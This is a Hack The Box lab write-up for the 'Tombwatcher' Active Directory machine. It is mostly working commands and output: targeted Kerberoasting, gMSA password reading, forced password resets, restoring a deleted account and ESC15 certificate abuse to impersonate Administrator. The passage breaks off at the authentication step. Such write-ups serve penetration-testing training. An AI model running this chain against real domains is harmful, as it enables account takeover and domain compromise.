> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-tombwatcher.md).

# HTB - Tombwatcher

## Enumeration

### Nmap

```bash
┌──(ajay㉿kali)-[~]
└─$ nmap -sV -v -A 10.129.232.167    
Starting Nmap 7.98 ( <https://nmap.org> ) at 2026-05-26 13:08 -0400
PORT     STATE SERVICE       VERSION                                                                                                                                                                                                        
53/tcp   open  domain        Simple DNS Plus                                                                                                                                                                                                
80/tcp   open  http          Microsoft IIS httpd 10.0                                                                                                                                                                                       
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-26 21:08:43Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-05-26T21:10:11+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after:  2025-11-16T00:47:59
| MD5:     a396 4dc0 104d 3c58 54e0 19e3 c2ae 0666
| SHA-1:   fe5e 76e2 d528 4a33 8adf c84e 92e3 900e 4234 ef9c
|_SHA-256: 5128 aaea b79b bc06 762a 04d6 b475 4a21 a52c d1b1 205a 0440 85bd f5d6 2734 6ea9
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after:  2025-11-16T00:47:59
| MD5:     a396 4dc0 104d 3c58 54e0 19e3 c2ae 0666
| SHA-1:   fe5e 76e2 d528 4a33 8adf c84e 92e3 900e 4234 ef9c
|_SHA-256: 5128 aaea b79b bc06 762a 04d6 b475 4a21 a52c d1b1 205a 0440 85bd f5d6 2734 6ea9
|_ssl-date: 2026-05-26T21:10:11+00:00; +4h00m00s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-05-26T21:10:11+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after:  2025-11-16T00:47:59
| MD5:     a396 4dc0 104d 3c58 54e0 19e3 c2ae 0666
| SHA-1:   fe5e 76e2 d528 4a33 8adf c84e 92e3 900e 4234 ef9c
|_SHA-256: 5128 aaea b79b bc06 762a 04d6 b475 4a21 a52c d1b1 205a 0440 85bd f5d6 2734 6ea9
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-05-26T21:10:11+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after:  2025-11-16T00:47:59
| MD5:     a396 4dc0 104d 3c58 54e0 19e3 c2ae 0666
| SHA-1:   fe5e 76e2 d528 4a33 8adf c84e 92e3 900e 4234 ef9c
|_SHA-256: 5128 aaea b79b bc06 762a 04d6 b475 4a21 a52c d1b1 205a 0440 85bd f5d6 2734 6ea9
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
```

### DNS

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMyaA7jUV7cTYfrNtJv2J%2Fimage.png?alt=media&amp;token=494e0e2c-a02d-41c8-8329-1df73b7bf14e" alt=""><figcaption></figcaption></figure>

No DNS zone transfer

### SMB

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FT1YQPDEnI4Lj2GjEroze%2Fimage.png?alt=media&amp;token=e399db17-69c4-4b5d-a6fd-9e3805c4d44f" alt=""><figcaption></figcaption></figure>

Have anonymous access but cant enumerate the shares.

We were given credentials

`henry : H3nry_987TGV!`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBlV9Qdxa4Ss88kmzL2rH%2Fimage.png?alt=media&amp;token=7ead59c8-79f3-49c5-950b-cf25378c1cc9" alt=""><figcaption></figcaption></figure>

No interesting Shares

Enumerated users through nxc

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FgCFnh8OhDlK5WmlSonJ7%2Fimage.png?alt=media&amp;token=1cbd7a9a-a61c-4a99-ab26-2f1f7cd8745d" alt=""><figcaption></figcaption></figure>

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fvg0h1XzBMWiZGmzeAV7b%2Fimage.png?alt=media&amp;token=ae58ec0c-5146-48de-91b2-a12932373dce" alt=""><figcaption></figcaption></figure>

No interesting directories found on the machine.

### Bloodhound

since i have got nothing here what i can do i use the creds given to collect bloodhound data and see if it can lead me anywhere

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLD6sOCj8x1GRfhJJ3Ig6%2Fimage.png?alt=media&amp;token=914d2fbf-26b9-4ec3-a5f4-e6b6f831cf2a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FEFlw5JnWoRdHH6Qer2nr%2Fimage.png?alt=media&amp;token=8d5c998c-6fa4-4e01-9627-3f8ca139a630" alt=""><figcaption></figcaption></figure>

Henry has WriteSPN on Alfred so i can perform an targetedkerberoasting attack and retreive the hash of alfred.

first i need to sync my time with the machine.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FqGqSpGrSUsshrDHUaUyt%2Fimage.png?alt=media&amp;token=61b8037c-25fc-4ece-9e14-ca0d89a32947" alt=""><figcaption></figcaption></figure>

## Foothold

### Targeted Keberoasting Attack

```bash
┌──(ajay㉿kali)-[~/Tools/targetedKerberoast]
└─$ python3 targetedKerberoast.py -v -d 'tombwatcher.htb'  -u 'henry' -p 'H3nry_987TGV!' --request-user 'alfred'  --dc-ip 10.129.232.167
[*] Starting kerberoast attacks
[*] Attacking user (alfred)
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$184b726e3b2cb84f540f3216c5436484$744f7219bf753082fc913ff4f9769c44366fc2acb91f87c289f179831f9e7a73793cfef1dc582505163bdcbd5b0402a835ba3ac0982137c39764112ae107b8dcce8c13a29bf93a1a1bc9f0347b5bf988bdf7c4ebc725769926cd7a1f09009247a4ecf4d46824251670db3e84b10455e3e631ed38234a375d59e5545f537d134411f4f47d8f4610fc6a22a0528fb325d855bf8beb065d27fbaa61c89c4825132fdb196d0bfe8591f8a59e01d199daeda56264d7a545dc538dac4f2660ca0441e84b6b2501ecd309bd9b3e592531eca2d232eac568879eafdd1aea4a66e540c027f439c2f25edb489592ef66be7b22c5f38510f63a9f5ae9df7033dad48cb35abf80d79e98b179ad862d7748c18f27b1fd582fdc33d696b2420334ef41829a1a877433d16cd718cb6c996a738c63407de4247ff5075190a707c209ee9394ef7474c490468d15d2aece9474e7adaa8c0ebe16225e4c5dc0585cfdf7167eff4242aa6e01452a83b188f7cea515a4219af0785c5163a03a657fcf829ea41c897349591ecaf066f9d601c29b3b5f590cceafe0433ca8a5f540307bc453399d0e303a37c571b496210a207b217d7ccf13390d54649cbbd895532c83323cd967ebace2d8b03921f6ea310d89555cf7cd7a26e7ed9eb1604af376d8b04bd98a804fbfd2cb2c9b4865e56028973dae6db052926855ec8e4206707754435eaf772f148e418def0c1f60837e9aa594e870cdde2053f780af91f8d98613c87b0fb17c722451e3b95f870c247468113ed6420e9332bf1f643ed6b73c64ae10567eff83e7ca5f6878a8b3e19e9913999e37f36f47f44191c05cd5df7e1613dddecfee7ca5ae71b7200ec08977af42f6e6919595d49cd8ed7219cea9092f4a60dd3689bf28a3d8b570e5ae91ac25fa5057601427b0aa35d24184638cebd8a877e390793b1db72f282c4e6e795d361fde888763e12e82725e2f07a87f5ffaef82b6c15579da76bb50bf73dc3bd541eacc3a08329ffc4a895940ccdeadb60277900d04eb67dcfe3603a3aa1445d264ceda7810814690edd9efd96db0b62271d5738de813e1091a925736cf5f1a35389f6663c55e2a7d6e844c29b0c28d092c618af7796af9a7d96008510ac97bcc3d5913d0e5ff6e3198b660ef1633d04fd3032d6c59ee0957e3ada38459e5730b3c64d2f6b5baf60bec00c45e4f19f2031039c980deb28174e77885b34d90272abaa73472f19c28395606375cd888798580d3f539ff313792e14457919f9c4a9c58c8bf24431c48d926f042aa32dcd4e823dec4b5315b245aa303747f37e52bdc58d96c45e0d4557bcaea8f8dd67296a64fb2275200ffeba35b29501665dc9e2718b4fa8c761693980ec8818e411eb47ff9616d19ee2e1d6bac9a1da0232ea2613bc5221f69427aa983bea65ebe35c15c2408b921bc2c32dd038165866c8f372851ec71ce247e8e5528491f11e8f5926c
[VERBOSE] SPN removed successfully for (Alfred)
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FxtfhDavg8E2CkELg7LrR%2Fimage.png?alt=media&amp;token=c4c7e85e-f88f-4951-9579-167cbd270b60" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvBJioc4hexyPxmK6n9bY%2Fimage.png?alt=media&amp;token=ee95caf5-b78a-4692-9313-70074ef506fd" alt=""><figcaption></figcaption></figure>

`Alfred : basketball`

Back on the blood, alfred as permission to add himself to `INFRASTRUCTURE` group

i can use bloodyAD for this purpose

### Addself&#x20;

```bash
──(ajay㉿kali)-[~]
└─$ bloodyAD --host 10.129.232.167 -d 'tombwatcher.htb' \
  -u 'alfred' -p 'basketball' \
  add groupMember 'INFRASTRUCTURE' 'alfred'
[+] i alfred added to INFRASTRUCTURE
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ bloodyAD --host 10.129.232.167 -d 'tombwatcher.htb' \
  -u 'alfred' -p 'basketball' \
  get object 'alfred' --attr memberOf      

distinguishedName: CN=Alfred,CN=Users,DC=tombwatcher,DC=htb
memberOf: CN=Infrastructure,CN=Users,DC=tombwatcher,DC=htb
```

Alfred is added to the group.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8IGS02IBrnOZqkmtt3yi%2Fimage.png?alt=media&amp;token=e289d931-9dc6-4fa7-adad-051682737346" alt=""><figcaption></figcaption></figure>

`INFRASTRUCTURE` group has `ReadGMSAPassword` on `ANSIBLE_DEV$`

As alfred is part of `INFRASTRUCTURE` he can use the privilege of infrasturcture to `readGMSAPassword` of `Ansible_DEV.`

### ReadGMSAPassword

```bash
┌──(ajay㉿kali)-[~]
└─$ bloodyAD --host 10.129.232.167 -d 'tombwatcher.htb' -u 'alfred' -p 'basketball' get object 'ANSIBLE_DEV$' --attr msDS-ManagedPassword

distinguishedName: CN=ansible_dev,CN=Managed Service Accounts,DC=tombwatcher,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:cba56cd2df7d642f622e2a59956f6d47
msDS-ManagedPassword.B64ENCODED: mfN6zpVwyTpoirhbjkl6QrRJVzGohXxRem98/IxOBHXUQ85SDNU5VgvC3uXsQB/C6pbTxd7aibpSAqrOM1eSdNoMbIg4IhijwGXxCrO5MO2GoxDTHtcONai9KdT8XCpT1iyj+77LVBMa9ilfS7DvXeOdbQhxBxxkoKadbkvcsdbOn2ZNVik2TRLuj88ro9oZWkwrF7cMptgDjuM0rjRjQ9Qqsfu5z0JY8p6bV9U0oUIrUwNHgTPtmm17jLoRXzjbD20M++s1W/g3KwEFEqeSgRANdU7kBcIOqvA0iZl0iYsj5DHHJ4xQg7Ablcozb5OrLQJXj462u3yf7NG0GciqTA==
```

got the NTLM Hash of `Anisible_dev$` : `aad3b435b51404eeaad3b435b51404ee:cba56cd2df7d642f622e2a59956f6d47`

`Anisible_dev$` can force change password of Sam.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FjgMjWIIw4vNpzf5kiR79%2Fimage.png?alt=media&amp;token=7637011a-2bd5-4e66-9d6c-82a3f6e90fe1" alt=""><figcaption></figcaption></figure>

### ForceChangePassword

```bash
┌──(ajay㉿kali)-[~]
└─$  bloodyAD --host 10.129.232.167 -d 'tombwatcher.htb'   -u 'ANSIBLE_DEV$'   -p ':cba56cd2df7d642f622e2a59956f6d47'   set password 'sam' 'Password123!'
[+] Password changed successfully!
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F3sr86FCljhonR5zDcYNF%2Fimage.png?alt=media&amp;token=0774fb45-576a-4271-af80-7e676fa4613a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKHbtHH1iMyhIPgikwn1R%2Fimage.png?alt=media&amp;token=8bc9a062-46af-48e1-90ac-48f1f6bdd6bd" alt=""><figcaption></figcaption></figure>

Sam have `WriteOwner` on `JOHN` and `JOHN` has `GenericALL` on `ADCS`

### WriteOwner

```bash
#Step 1 — Set Sam as Owner of John
bloodyAD --host 10.129.232.167 -d 'tombwatcher.htb'   -u 'sam' -p 'Password123!'   set owner 'john' 'sam'
[+] Old owner S-1-5-21-1392491010-1358638721-2126982587-512 is now replaced by sam on john

#Step 2 — Give Sam FullControl / GenericAll over John
┌──(ajay㉿kali)-[~]
└─$ bloodyAD --host 10.129.232.167 -d 'tombwatcher.htb'   -u 'sam' -p 'Password123!'   add genericAll 'john' 'sam'
[+] sam has now GenericAll on john

#Step 3 — Force Change John's Password
┌──(ajay㉿kali)-[~]
└─$ bloodyAD --host 10.129.232.167 -d 'tombwatcher.htb'   -u 'sam' -p 'Password123!'   set password 'john' 'Password123!'
[+] Password changed successfully!
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhW1lxFDkwSIhUBku7Yzn%2Fimage.png?alt=media&amp;token=8648d913-88a1-4bdf-814d-a2d1bab75de8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLy1eFCCgPWYVdlhztYtx%2Fimage.png?alt=media&amp;token=ffbf867d-78b1-40ef-8b6b-b49daf0a469d" alt=""><figcaption></figcaption></figure>

As is john is part of `Remote Management Groups` i have get a shell as John

## Shell as John

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQ2MFg1zfaj2jahZcxAIC%2Fimage.png?alt=media&amp;token=c97fe47a-43a3-403b-ad97-13fa6bc4be5c" alt=""><figcaption></figcaption></figure>

Grab the `user.txt`

### GenericALL on ADCS

i can use ceritpy to enumerate vulnerable templates

```bash
─(ajay㉿kali)-[~]
└─$ certipy find -u 'john@tombwatcher.htb' -p 'Password123!'   -dc-ip 10.129.232.167 -vulnerable -stdout             
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : tombwatcher-CA-1
    DNS Name                            : DC01.tombwatcher.htb
    Certificate Subject                 : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
    Certificate Serial Number           : 3428A7FC52C310B2460F8440AA8327AC
    Certificate Validity Start          : 2024-11-16 00:47:48+00:00
    Certificate Validity End            : 2123-11-16 00:57:48+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : TOMBWATCHER.HTB\Administrators
      Access Rights
        ManageCa                        : TOMBWATCHER.HTB\Administrators
                                          TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        ManageCertificates              : TOMBWATCHER.HTB\Administrators
                                          TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Enroll                          : TOMBWATCHER.HTB\Authenticated Users
Certificate Templates                   : [!] Could not find any certificate templates
```

Couldnt find any vulnerable templates.

```bash
──(ajay㉿kali)-[~]
└─$ certipy find -u 'john@tombwatcher.htb' -p 'Password123!'   -dc-ip 10.129.232.167 -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Failed to lookup object with SID 'S-1-5-21-1392491010-1358638721-2126982587-1111'
[*] Saving text output to '20260526203952_Certipy.txt'
[*] Wrote text output to '20260526203952_Certipy.txt'
[*] Saving JSON output to '20260526203952_Certipy.json'
[*] Wrote JSON output to '20260526203952_Certipy.json'
```

searching for all the templates showed a lookup for an object whose sid is shown but not the name of the user.

### Resolving Sid and Finding the Deleted Account

```bash
*Evil-WinRM* PS C:\Users\john\Desktop> $sid = New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1392491010-1358638721-2126982587-1111")
*Evil-WinRM* PS C:\Users\john\Desktop> $sid.Translate([System.Security.Principal.NTAccount])
Exception calling "Translate" with "1" argument(s): "Some or all identity references could not be translated."
At line:1 char:1
+ $sid.Translate([System.Security.Principal.NTAccount])
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : IdentityNotMappedException
*Evil-WinRM* PS C:\Users\john\Desktop> 

```

Th SID is not able to resolved. it's likely a deleted account that still has ACEs on the WebServer template.

Looking at the certipy results the sid still have enrollment rights.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8uIfbYYI49iowQi9ICSg%2Fimage.png?alt=media&amp;token=4049d903-8c07-4733-815c-08c7199b6f2a" alt=""><figcaption></figcaption></figure>

```bash
*Evil-WinRM* PS C:\Users\john\Desktop> Get-ADObject -Filter {ObjectSID -eq "S-1-5-21-1392491010-1358638721-2126982587-1111"} -IncludeDeletedObjects -Properties *

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : tombwatcher.htb/Deleted Objects/cert_admin
                                  DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
CN                              : cert_admin
                                  DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
codePage                        : 0
countryCode                     : 0
Created                         : 11/16/2024 12:07:04 PM
createTimeStamp                 : 11/16/2024 12:07:04 PM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData           : {11/16/2024 12:07:10 PM, 11/16/2024 12:07:08 PM, 12/31/1600 7:00:00 PM}
givenName                       : cert_admin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 11/16/2024 12:07:27 PM
modifyTimeStamp                 : 11/16/2024 12:07:27 PM
msDS-LastKnownRDN               : cert_admin
Name                            : cert_admin
                                  DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
objectSid                       : S-1-5-21-1392491010-1358638721-2126982587-1111
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133762504248946345
sAMAccountName                  : cert_admin
sDRightsEffective               : 7
sn                              : cert_admin
userAccountControl              : 66048
uSNChanged                      : 13197
uSNCreated                      : 13186
whenChanged                     : 11/16/2024 12:07:27 PM
whenCreated                     : 11/16/2024 12:07:04 PM
```

the sid is linked to a user called `cert_admin`.

### Recovering Cert\_admin

Since John has GenericAll on ADCS, we can restore this deleted account and use it!

```bash
#step1: Restore cert_admin
*Evil-WinRM* PS C:\Users\john\Desktop> Restore-ADObject -Identity "938182c3-bf0b-410a-9aaa-45c8e1a02ebf"
#step2 : verify its back
*Evil-WinRM* PS C:\Users\john\Desktop> Get-ADUser -Identity "cert_admin"

DistinguishedName : CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb
Enabled           : True
GivenName         : cert_admin
Name              : cert_admin
ObjectClass       : user
ObjectGUID        : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
SamAccountName    : cert_admin
SID               : S-1-5-21-1392491010-1358638721-2126982587-1111
Surname           : cert_admin
UserPrincipalName :

#step3:Reset its password
*Evil-WinRM* PS C:\Users\john\Desktop> Set-ADAccountPassword -Identity "cert_admin" -Reset -NewPassword (ConvertTo-SecureString "Password123!" -AsPlainText -Force)
#step3:Enable the account
*Evil-WinRM* PS C:\Users\john\Desktop> Enable-ADAccount -Identity "cert_admin"

```

searching for vulnerable templates as `cert_admin`

```bash
──(ajay㉿kali)-[~]
└─$ certipy find -u 'cert_admin@tombwatcher.htb' -p 'Password123!'   -dc-ip 10.129.232.167 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : tombwatcher-CA-1
    DNS Name                            : DC01.tombwatcher.htb
    Certificate Subject                 : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
    Certificate Serial Number           : 3428A7FC52C310B2460F8440AA8327AC
    Certificate Validity Start          : 2024-11-16 00:47:48+00:00
    Certificate Validity End            : 2123-11-16 00:57:48+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : TOMBWATCHER.HTB\Administrators
      Access Rights
        ManageCa                        : TOMBWATCHER.HTB\Administrators
                                          TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        ManageCertificates              : TOMBWATCHER.HTB\Administrators
                                          TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Enroll                          : TOMBWATCHER.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : WebServer
    Display Name                        : Web Server
    Certificate Authorities             : tombwatcher-CA-1
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-16T00:57:49+00:00
    Template Last Modified              : 2024-11-16T17:07:26+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          TOMBWATCHER.HTB\cert_admin
      Object Control Permissions
        Owner                           : TOMBWATCHER.HTB\Enterprise Admins
        Full Control Principals         : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Owner Principals          : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Dacl Principals           : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Property Enroll           : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          TOMBWATCHER.HTB\cert_admin
    [+] User Enrollable Principals      : TOMBWATCHER.HTB\cert_admin
    [!] Vulnerabilities
      ESC15                             : Enrollee supplies subject and schema version is 1.
    [*] Remarks
      ESC15                             : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
```

Found a Vulnerabale template.

**ESC15 (CVE-2024-49019)** — cert\_admin can enroll in WebServer template with `EnrolleeSuppliesSubject` and schema version 1, allowing us to specify any EKU including Client Authentication!

## Exploiting ESC15

Step 1 : Request cert with Client Authentication EKU as Administrator

```bash
┌──(ajay㉿kali)-[~]
└─$  certipy req -u 'cert_admin@tombwatcher.htb' -p 'Password123!'   -dc-ip 10.129.232.167   -ca 'tombwatcher-CA-1'   -template 'WebServer'   -upn 'administrator@tombwatcher.htb'   -application-policies 'Client Authentication'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 4
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@tombwatcher.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
```

Step 2 : Authenticate as Administrator

```bash
──(ajay㉿kali)-[~]
└─$ certipy auth -pfx 'administrator.pfx'   -dc-ip 10.129.232.167
Certipy v5.0.4 - by Oliver Lyak (ly4k)

